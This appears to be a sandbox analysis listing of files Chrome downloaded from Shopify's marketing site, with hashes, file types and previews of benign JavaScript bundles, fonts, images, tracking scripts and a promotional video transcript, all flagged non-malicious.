                                                                    Preview:import{a as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-KZHICCPI.js";import{i as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var u=c(a());function f(){let{getSignupURL:r}=l();return(0,u.useEffect)(()=>{document.addEventListener("contextmenu",n=>{let e=n.target;if(e instanceof HTMLAnchorElement){let t=e.getAttribute("href");if(t&&t.startsWith(o)){let i=r({url:t}).toString();e.setAttribute("href",i)}}}),document.addEventListener("click",n=>{let e=n.target,t=e.getAttribute("href"),i=e.getAttribute("target")==="_blank";if(t&&t.startsWith(o)){n.preventDefault();let s=r({url:t}).toString();i?window.open(s,"_blank"):window.location.href=s}}),document.addEventListener("auxclick",n=>{let t=n.target.get
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):5182889
                                                                    Entropy (8bit):4.964553244397933
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:19CA3074844E4BDC79AB42DF33F7E1A7
                                                                    SHA1:DCFA59C4DF3FB4793C3CED13C6B909D100A59FF4
                                                                    SHA-256:9FAA97FF0EDE26506FC36DA62D398D957FE4463C899651858E04FD743891EBB5
                                                                    SHA-512:043D748BE31CDAC0C4E3C0FE403882D2F7A2F088CC834AF06A154066BCD855ED275F8A6A5FDB6838FCE8B36F58B31E3CF1A050596B99CA82756AF83B15FE976D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/manifest-F45A1591.js
                                                                    Preview:window.__remixManifest={"entry":{"module":"https://cdn.shopify.com/shopifycloud/brochure-iii/production/entry.client-EF3SCZJV.js","imports":["https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-QFMWBZ23.js","https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js","https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js","https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js","https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js"]},"routes":{"pages/shopify.com/($locale)/subscription-free-promotion/terms-and-conditions":{"id":"pages/shopify.com/($locale)/subscription-free-promotion/terms-and-conditions","parentId":"root","path":":locale?/subscription-free-promotion/terms-and-conditions","module":"https://cdn.shopify.com/shopifycloud/brochure-iii/production/pages/shopify.com/($locale)/subscription-free-promotion/terms-and-conditions-PZYDE
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x43, components 3
                                                                    Category:downloaded
                                                                    Size (bytes):3081
                                                                    Entropy (8bit):7.7949316397401125
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3CFB4E7F2F49C23254CD71FE5E716AA4
                                                                    SHA1:B105B651AE7D148DD21132064F16466D209398B9
                                                                    SHA-256:557C284B7971E8F7A9AC8DBCBB80A0C0A950352E4C70ABEE3BAA98120905D007
                                                                    SHA-512:9F5A64667B63AEB6CDF4CAF770E2D6FE5AD9975C606703E1C2179DEF6F0DBF3A87EA181A2FEA9AA42375C11D9E143C71214375143237006021F2CCEA17587D15
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://fast.wistia.com/embed/medias/udg64rrxbi/swatch
                                                                    Preview:......JFIF.............C....................................................................C.......................................................................+.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....+!..^.....o...?.......uM..'..T....:..T..|m..J..U.I..2F..c...|?...]k.W.......K..#.D..Hf.U#b..!.c?.OO........).......'..l..y.%..m..LL.....2Yk=.{.bm_.+...'...Q~......>#..<I.wG..R.L..ie.V.b.I#..y..y...i../......iR|K..A..Z...n|..O....#...........+.t....>m........PM.y#.Ut.P.t....n....f........g.............A<_n..A....6%......\.d..!.....1.9..M......l}O...m;...v.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):8600
                                                                    Entropy (8bit):5.435462770866419
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E4218BFC646457EE2999CAA4F078B9B7
                                                                    SHA1:0A9F25CBB89963234994A3E34F732562B15AEB6B
                                                                    SHA-256:ACD8905FE971BAF49475990716CD2BAE599A94FE8B3836D781F35D2224042BB2
                                                                    SHA-512:CE037EA8D92DE43DCF74FB9BFBF90F2622B3FF9470832C7BC896A3BC9ADA81DAD80C166EB8013DAB8FE0D8FF15EDA791625ED666BB1D84B47F6EAF0163714E13
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:"https://fonts.googleapis.com/css?family=Montserrat:300,400,500,600,700"
                                                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-f
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):116
                                                                    Entropy (8bit):4.76539561879329
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:105AEF60ECCC618FA0B54C40B2FA79A5
                                                                    SHA1:7451A75F680B37751A54F4C07483421F215BACA7
                                                                    SHA-256:17D070998E8E9108DDC72262C08C6783F38A6673C4154381FA2CE4DE39C71A06
                                                                    SHA-512:8C4F6467FF29EA463957E97716EE35EA9FD4E5D6119BE87D436001C16F22FA26FF134FB62D1A56F53D03DB9EC17A83AD865BE1835D9014E068C7D92EE01A5B62
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.bizible.com/xdc.js?_biz_u=ae1c5647a6fb48cacbb28d65c9586a6c&_biz_h=-1777624096&cdn_o=a&jsVer=4.24.03.21
                                                                    Preview:(function () {.. BizTrackingA.XdcCallback({.. xdc: "ae1c5647a6fb48cacbb28d65c9586a6c".. });..})();..;..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (7028)
                                                                    Category:downloaded
                                                                    Size (bytes):7029
                                                                    Entropy (8bit):5.691245216850939
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3AFCE6F4FAA737687F7084B6AAA6DEDE
                                                                    SHA1:C63BCC25BF4D4126E3A03F08A8C714864506403B
                                                                    SHA-256:5EA173D84EB24A66D12449AA366D123A55DEAE6358825697157FDB40BC39A5E3
                                                                    SHA-512:A35B7D1B9E6F4BF4E7BABD9ED2C561962C06E1EABD991DBCD4430A0545B8BC99FB65C31306D5704323A62F808299A00F7D70DAAC330382C625E190AB445C5168
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-X2RZ36X5.js
                                                                    Preview:import{a as ie}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3D2LATV4.js";import{a as H}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3IZVO27T.js";import{a as te}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NXLQIWVT.js";import{a as ee}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TSB5B3F2.js";import{e as D}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{b as Y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{ba as X}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{b}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as be}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as U}from"https://cdn.shopif
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):484
                                                                    Entropy (8bit):5.158019698280664
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:ABAF1CB714AA04D3C998E7A6AF44EAF5
                                                                    SHA1:C48604E02956A22B9826AC7D219A7185B7CEA707
                                                                    SHA-256:75E27771A1461D41EEEA6D3776873FCF0DCA705AFB334ADADB0C7DC0A20B0404
                                                                    SHA-512:1A674985DE95AFF74E82C9918A601E5B90E84FC1B98E3BE4BE83E616C042C98E416B10FEDD8328FC6B179184DFD10B949397E645B4249DB0C4F076DAEB2E293E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="24" cy="24" r="24" fill="#E5FDF3"/>.<circle cx="24" cy="24" r="17" fill="#AEF2D7"/>.<path d="M24 16.75L31.25 21L24 25.25L16.75 21L24 16.75Z" stroke="#2D7156" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path d="M21.25 24L16.75 27L24 31.25L31.25 27L26.6722 24" stroke="#2D7156" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.</svg>.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3950)
                                                                    Category:downloaded
                                                                    Size (bytes):107418
                                                                    Entropy (8bit):4.972752117799746
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9A16BE81A81FD37F20094779A2F79C48
                                                                    SHA1:7954C07E893168DF1A05E5F398E48A91BC0F96C1
                                                                    SHA-256:E0A93C95249CEBBB8A22324D3F8E5F0801A41FF1FD27AC43485F8A56816E366A
                                                                    SHA-512:54E548A06694F19A748F04546E937C336120B0C3D8E97E32CF0D86AE4694F53D828553FB4F87E0C97589D59E6364B2C679A36D08C360F0A84860B34B38606CD4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/main-0848513ab96834b7b8adae23e7926ac3.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[17],[./*!**************************************************!*\. !*** ../node_modules/core-js/modules/_export.js ***!. \**************************************************/./*! no static exports found */./*! all exports used */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(t,n,e){var v=e(/*! ./_global */2),h=e(/*! ./_core */12),g=e(/*! ./_hide */10),m=e(/*! ./_redefine */14),y=e(/*! ./_ctx */15),_="prototype",x=function(t,n,e){var r,o,i,u=t&x.F,c=t&x.G,s=t&x.S,a=t&x.P,f=t&x.B,l=c?v:s?v[n]||(v[n]={}):(v[n]||{})[_],p=c?h:h[n]||(h[n]={}),d=p[_]||(p[_]={});for(r in e=c?n:e)o=((i=!u&&l&&void 0!==l[r])?l:e)[r],i=f&&i?y(o,v):a&&"function"==typeof o?y(Function.call,o):o,l&&m(l,r,o,t&x.U),p[r]!=o&&g(p,r,i),a&&d[r]!=o&&(d[r]=o)};v.core=h,x.F=1,x.G=2,x.S=4,x.P=8,x.B=16,x.W=32,x.U=64,x.R=128,t.exports=x},,./*!**************************************************!*\. !*** ../node_modules/core-js/modules/_global.js *
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text
                                                                    Category:downloaded
                                                                    Size (bytes):15857
                                                                    Entropy (8bit):4.988229057774257
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:27E7CBD9D6B970B7DA1D953DBE2D5B7F
                                                                    SHA1:9D16FD2C688A41CFE5F38CE907227AD6B4C2F51B
                                                                    SHA-256:A256CF882C036E28A36DB14DEADD672866B9B0777EB6F26545EB4154990C6417
                                                                    SHA-512:D7B3D4809C65B164E114CEF196E6307FDB63947CC8AC5C5B41C9A67FFFCA5E1E06C58A7E8DB3EE871D803415EFD9540AD3D625C902EF85F1C9B6200FD9166B0E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.vidyard.com/transcriptions/NGzOpGc0Y5kjGICp9EM2mQ/dTzjwHqyDOVDldd1poT0Kg.vtt?tRGJ-3-KWyc1Wq0AVMluSCL4tTLfCTQidru08ktKMVw7Q2n9mjESPjA18tOFIR4MaUKSpduq-7Hr4ETwJ_dPtGKJMkVXXCBgGYKnMr2QT75Vjx3OOkHhsjzBP_7ucRGOSHaSIZvKY9zvow
                                                                    Preview:WEBVTT..1.00:00:00.083 --> 00:00:02.460.This is a story about us...2.00:00:02.669 --> 00:00:03.169.Shopify...3.00:00:03.294 --> 00:00:03.628.Shopify...4.00:00:03.628 --> 00:00:04.963.Shopify is making headlines...5.00:00:05.505 --> 00:00:08.258.A company born.from a powerful realization...6.00:00:08.591 --> 00:00:11.428.No one, I realized, has spent a moment..7.00:00:11.428 --> 00:00:14.597.building software.for starting new businesses...8.00:00:14.597 --> 00:00:16.516.And this is also a story about you...9.00:00:16.516 --> 00:00:17.475.Entrepreneur!..10.00:00:17.475 --> 00:00:19.477.The millions of entrepreneurs.who had a dream..11.00:00:19.477 --> 00:00:21.563.and the courage to actually go for it...12.00:00:21.563 --> 00:00:22.647.The site is live!..13.00:00:22.647 --> 00:00:24.357.My hands are literally shaking...14.00:00:24.357 --> 00:00:28.570.Being an entrepreneur, it's not changing your job, it's.changing your life...15.00:00:28.570 --> 00:00:30.196.New order! First one...16.00
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (3449)
                                                                    Category:downloaded
                                                                    Size (bytes):3499
                                                                    Entropy (8bit):5.026198069237878
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:0A0EE12C364D72429AFE6538201F21A1
                                                                    SHA1:F42C1ED4D38B4D6F28FEF20E780051108A356599
                                                                    SHA-256:2F05FDEE639721045692D1422D8156B4759CA001BD1C17A7E26D95DB58DEE876
                                                                    SHA-512:6A475373638A136F2F0DE3F03402C3999F80747BB6C694DAE08AF88930031E83254E538804D7FE93480FFB6F824BCD490B86759BAE5DCC7DB336C992A4265251
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://storage.googleapis.com/workbox-cdn/releases/6.2.0/workbox-routing.prod.js
                                                                    Preview:this.workbox=this.workbox||{},this.workbox.routing=function(t,e){"use strict";try{self["workbox:routing:6.2.0"]&&_()}catch(t){}const s=t=>t&&"object"==typeof t?t:{handle:t};class r{constructor(t,e,r="GET"){this.handler=s(e),this.match=t,this.method=r}setCatchHandler(t){this.catchHandler=s(t)}}class n extends r{constructor(t,e,s){super((({url:e})=>{const s=t.exec(e.href);if(s&&(e.origin===location.origin||0===s.index))return s.slice(1)}),e,s)}}class i{constructor(){this.ut=new Map,this.ht=new Map}get routes(){return this.ut}addFetchListener(){self.addEventListener("fetch",(t=>{const{request:e}=t,s=this.handleRequest({request:e,event:t});s&&t.respondWith(s)}))}addCacheListener(){self.addEventListener("message",(t=>{if(t.data&&"CACHE_URLS"===t.data.type){const{payload:e}=t.data,s=Promise.all(e.urlsToCache.map((e=>{"string"==typeof e&&(e=[e]);const s=new Request(...e);return this.handleRequest({request:s,event:t})})));t.waitUntil(s),t.ports&&t.ports[0]&&s.then((()=>t.ports[0].postMessage(!
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (2540)
                                                                    Category:downloaded
                                                                    Size (bytes):2541
                                                                    Entropy (8bit):5.3115696033534645
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FAC2EC32049485C3E91067B0E6D7A5CB
                                                                    SHA1:7290B2C424125EEC41AD3C45FB437F2700624BE8
                                                                    SHA-256:1B9F6CA962A37F15112079A266AA8E4BA0A95554E9152C138863432F119159E5
                                                                    SHA-512:552EAC9812714FBAEDAAB85E68CEF3F81C3C2564417B18F51489495E3D2607557B42876B4A977C17328ECFA04FF5D1BD1E3E97DB3F2A46678B200A014717A2A4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-IK3X57EU.js
                                                                    Preview:var T=e=>e.toLowerCase().replace(/^data-|^-/,"").replace(/-./g,t=>(t[1]||"").toUpperCase()).replace(/-/g,""),c=e=>(e=decodeURIComponent(e),e=e.replace(/[A-Z]{2,}/g,t=>`${t.charAt(0)}${t.substring(1).toLowerCase()}`),e=e.charAt(0).toLowerCase()+e.substring(1),e=e.replace(/[\s_:./,\\\n|]/g,"-"),e=e.replace(/[A-Z]/g,t=>`-${t.toLowerCase()}`),e=e.replace(/-{2,}/g,"-"),e=e.replace(/[^a-z0-9-]/g,"?"),e=e.replace(/(^-)|(-$)/g,""),e=e.substring(0,50),e);var E=e=>{let t=e.dataset.sectionName||e.dataset.componentName||e.getAttribute("name")||e.getAttribute("id")||e.getAttribute("aria-label")||e.innerText||e.textContent||`unhandled-${e.tagName}`;return c(t)},x=e=>{try{return new URL(e,document.baseURI).origin.match(/shopify.|myshopify.io|spin.dev/)}catch(t){return console.error("isShopifyLink",t),!1}},k=e=>{let t=e.tagName.toLowerCase();switch(t){case"button":return"button_click";case"a":return x(e.getAttribute("href")||"")?"link_click":"outbound_link_click";case"select":return"dropdown_click";ca
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (6090)
                                                                    Category:downloaded
                                                                    Size (bytes):6091
                                                                    Entropy (8bit):4.79527435903636
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:5617A2A3CE53FA3450BB899F4024FE20
                                                                    SHA1:5EB9ADDC303F02EAF54B1E83DA5B2728F0067ED9
                                                                    SHA-256:0FABE3475B00B0676F6A758D8167CF1C1A7433ADDE2C8B9E455C853329578D39
                                                                    SHA-512:9993E80594344FABFFE1667A33BF82B22069072073F50CA537776D3F3D8801AF8086A48EAF031062C612B750D1547669C16E06202F84E45C2D4C0BBBADE8C554
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XJAW7GJS.js
                                                                    Preview:import{b as V}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var i=t(e()),M=o=>(0,i.jsx)("svg",{viewBox:"0 0 30 30",...o,children:(0,i.jsx)("path",{d:"M15.6 30V19.4h5V15h-5v-3.1c0-1 .6-1.9 1.3-1.9h3.8V5.6h-3.8c-3.1 0-5.6 2.8-5.6 6.3V15H7.5v4.4h3.8v10.1C4.8 27.9 0 22 0 15 0 6.7 6.7 0 15 0s15 6.7 15 15c0 8.1-6.4 14.7-14.4 15z"})}),n=M;var c=t(e()),A=o=>(0,c.jsx)("svg",{viewBox:"0 0 18 18",...o,children:(0,c.jsx)("path",{clipRule:"evenodd",d:"M9 0c5 0 9 4 9 9s-4 9-9 9-9-4-9-9 4-9 9-9zM6.7 3.5h4.7c1.8 0 3.2 1.4 3.2 3.1v4.7c0 1.7-1.4 3.1-3.2 3.1H6.7c-1.8 0-3.2-1.4-3.2-3.1V6.7c0-1.8 1.4-3.2 3.2-3.2zM9 6.2c1.6 0 2.9 1.3 2.9 2.9S10.6 12 9 12s-3-1.3-3-2.9 1.3-2.9 3-2.9zm0 1.2c.9 0 1.7.8 1.7 1.7 0 .9-.8 1.7-1.7 1.7-.9 0-1.7-.8-1.7-1.7 0-.9.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (6596)
                                                                    Category:downloaded
                                                                    Size (bytes):6924
                                                                    Entropy (8bit):5.199794606834327
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:415FD2A6E36EACB7B4AA6A59A84265A5
                                                                    SHA1:B7396D199B9BAC2695C1D583B760647AA81EA618
                                                                    SHA-256:403BEE27A0FC27503A3ED85FA10ACE7E4BF21D9BAB67AA1587F56AA367BA9545
                                                                    SHA-512:7DF8A6723093AD68572318DAB652761874DA05AFCA77FE2DB5B9C4905602BF6893DB63C530D00C62250D60BFF23BA59B76D2C669015907757C25450B65FBAA9E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js
                                                                    Preview:import{c as w}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var V=w(r=>{"use strict";var y=Symbol.for("react.element"),D=Symbol.for("react.portal"),T=Symbol.for("react.fragment"),A=Symbol.for("react.strict_mode"),N=Symbol.for("react.profiler"),U=Symbol.for("react.provider"),F=Symbol.for("react.context"),L=Symbol.for("react.forward_ref"),M=Symbol.for("react.suspense"),z=Symbol.for("react.memo"),B=Symbol.for("react.lazy"),R=Symbol.iterator;function H(e){return e===null||typeof e!="object"?null:(e=R&&e[R]||e["@@iterator"],typeof e=="function"?e:null)}var C={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},j=Object.assign,O={};function p(e,t,n){this.props=e,this.context=t,this.refs=O,this.updater=n||C}p.prototype.isReactComponent={};p.prototype.setState=function(e,t){if(typeof e!="object"&&typeof e!="function"&&e!=null)throw Error("setState(...): takes an object of st
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2119)
                                                                    Category:downloaded
                                                                    Size (bytes):2120
                                                                    Entropy (8bit):5.320073394185394
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9FF6C6E0EFDCB1EBF49D373345B1B26E
                                                                    SHA1:0A43A664083DFAC7AB9A800AA2CC95A033009670
                                                                    SHA-256:D492A120C81A9D1C8E7BD81565EE1B9627139CAF2B1C139894FB12C985FE38AC
                                                                    SHA-512:71417949B9EF1BC6C90A30C3654B0C1E210F342EC8A6EB5B33F9D6932E80EB732293BFE7F45EF0734B3276E963184C4A439F24FA35E395AA53A0127F2AABC2CC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-WDJ4YB2L.js
                                                                    Preview:import{a as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZPCN7UGW.js";import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-AEETYEVW.js";import{b as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js";import{a as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NTXJAFG3.js";import{a as v}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var l=a(v()),n=a(o());function s({className:t,style:c,children:i,reverse:m}){return(0,n.jsx)("div",{className:(0,l.default)("font-ibmmono h-16 text-xl md:h-20 md:text-3xl font-semibold overflow-hidden relative text-black",t),style:c,"aria-hidden":!0,c
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (64864)
                                                                    Category:downloaded
                                                                    Size (bytes):104243
                                                                    Entropy (8bit):5.297831661848465
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:11DF02F08174858ED0023B3E9ECB0B66
                                                                    SHA1:EB3952C06FE050AF2673CB273F71AFE8EDD092BC
                                                                    SHA-256:531EF41FD8AF67FFD35E10F2147A4B9F27AA5E04B1AF9CBC41E016D0BF296371
                                                                    SHA-512:0DFFE950CAF8B0D19E9CDE53C0A65BD7493A1F06FEE034B729889B97C1645F688F3A6562706AAE6E6DD5E12D36BE96849D9F3C07F46C2F341D229C36EC71F502
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/vendors~access-code~player-pomo~whitelisted-embed-61d05a035333aec4c9f4860e28e0b0c5.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[2],{1063:./*!*****************************************************************!*\. !*** ../node_modules/react-dom/cjs/react-dom.production.min.js ***!. \*****************************************************************/./*! no static exports found */./*! all exports used */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(e,t,n){"use strict";./** @license React v16.7.0. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var l=n(/*! react */579),v=n(/*! object-assign */434),r=n(/*! scheduler */1064);function z(e){for(var t=arguments.length-1,n="https://reactjs.org/docs/error-decoder.html?invariant="+e,r=0;r<t;r++)n+="&args[]="+encodeURIComponent(arguments[r+1]);!function(e,t,n,r,l,i,a,o){var u,c;if(!e)throw(e=void 0)===t?e=Error("Minified e
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (64347)
                                                                    Category:downloaded
                                                                    Size (bytes):223599
                                                                    Entropy (8bit):5.455884833256567
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E41DBDC8D66F744A1D78A812ACB5DAEE
                                                                    SHA1:2DECD4278C8970DEAC099613E28A3D8CC4227A9C
                                                                    SHA-256:047E3259B6F0B42D781532FA122B2D8DE9AED187D766FD45EFCF119450EEB4C4
                                                                    SHA-512:3112E268877BA20DE5204A14D6E617EB0FEC94572F81139D4CC262ADED9EF8E9E601A939B1B2F43F1E25E1D09A725CE148107EB722B32AE8F946268C1F91082E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://connect.facebook.net/en_US/fbevents.js
                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1227)
                                                                    Category:downloaded
                                                                    Size (bytes):1228
                                                                    Entropy (8bit):5.228720975587684
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:93CF843076F8C5A707743CD58956A02A
                                                                    SHA1:66A25E6D9082E23CDED0A88D23A6A4DB8C898DBC
                                                                    SHA-256:1A33E5598C0ECB2943409CD697FF67E2C49CABD26560C32566B8581437899544
                                                                    SHA-512:B1DA1B6D17B37C22FD1918B83B59735E87664AA5A3039F3E99F26F1BFB1DFF2CD799F43C3BE904AD526F9B89CCC3814C7105D9F6DD35273EDF8C8A2E96E587EE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GF3AKGJL.js
